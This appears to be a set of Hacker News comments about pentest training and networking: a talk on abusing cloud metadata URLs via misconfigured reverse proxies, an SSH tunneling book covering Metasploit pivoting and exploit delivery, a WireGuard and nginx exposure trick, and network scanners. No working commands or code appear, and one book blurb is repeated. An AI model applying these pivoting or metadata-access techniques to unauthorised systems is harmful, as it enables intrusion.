If anyone is curious on how this can be abused, here's my "There's no place like 169.254.169.254 - (Ab)using cloud metadata URLs" slides [1] and talk [2] from 2019.
tl;dr - misconfigured reverse proxies allowed cloud metadata URL access across the bigger cloud providers.
I made it free to the HN community a few years back [1]. There is a paid interactive lab portion (details in the repo) if you are looking for hands-on experience.
Book Overview
This book is packed with practical and real world examples of SSH tunneling and port redirection in multiple realistic scenarios. It walks you through the basics of SSH tunneling (both local and remote port forwards), SOCKS proxies, port redirection, and how to utilize them with other tools like proxychains, nmap, Metasploit, and web browsers.
Advanced topics included SSHing through 4 jump boxes, throwing exploits through SSH tunnels, scanning assets using proxychains and Metasploit's Meterpreter, browsing the Internet through a SOCKS proxy, utilizing proxychains and nmap to scan targets, and leveraging Metasploit's Meterpreter portfwd command.
One thing I’ve always tried to find is a method of forwarding a local port on server A to a public facing port on server B. Googling this is very difficult. Is that possible with ssh?
I’ve also had this issue for quite sometime and I’ve used a few approaches over the years. My most recent approach has been to connect server A to server B, via WireGuard. Then on Server B I use nginx to reverse proxy the WireGuard IP address of Server A. This works nicely when:
1) you have access to install software server A, but it’s stuck behind a bunch of firewalls.
2) You’re trying to expose HTTP services- it’s possible to “stream” non-HTTP with nginx, but I don’t know enough to recommend that.
You might also want to look at Apache Guacamole or Boring Proxy. I’d love other recommendations!
I made this free to the HN community a few years back [1], but decided to make it available to everyone via a GitHub repo. There is a paid interactive lab portion (details in the repo) if you are looking for hands-on experience.
Book Overview
This book is packed with practical and real world examples of SSH tunneling and port redirection in multiple realistic scenarios. It walks you through the basics of SSH tunneling (both local and remote port forwards), SOCKS proxies, port redirection, and how to utilize them with other tools like proxychains, nmap, Metasploit, and web browsers.
Advanced topics included SSHing through 4 jump boxes, throwing exploits through SSH tunnels, scanning assets using proxychains and Metasploit's Meterpreter, browsing the Internet through a SOCKS proxy, utilizing proxychains and nmap to scan targets, and leveraging Metasploit's Meterpreter portfwd command.
Glad to see more open source options (I develop and maintain Scantron https://github.com/rackerlabs/scantron/) when it comes to network scanning! Appreciate your contribution to the community.
So you're not using nmap under the hood?
What's the largest IP space you've tested it on so far?
Scantron looks pretty awesome! liwasc isn't using nmap internally, the entire network scanner part (https://github.com/pojntfx/liwasc/blob/main/pkg/scanners/nod...) is <150 SLOC and the port scanner is <250 SLOC. Go has some really nice low-level networking APIs, especially when combined with `gopacket`.
I haven't really tested it on anything larger than /28 - it should probably work on larger ones as well though (it limits the maximum concurrent port & network scans so that ulimit etc. aren't an issue) :)
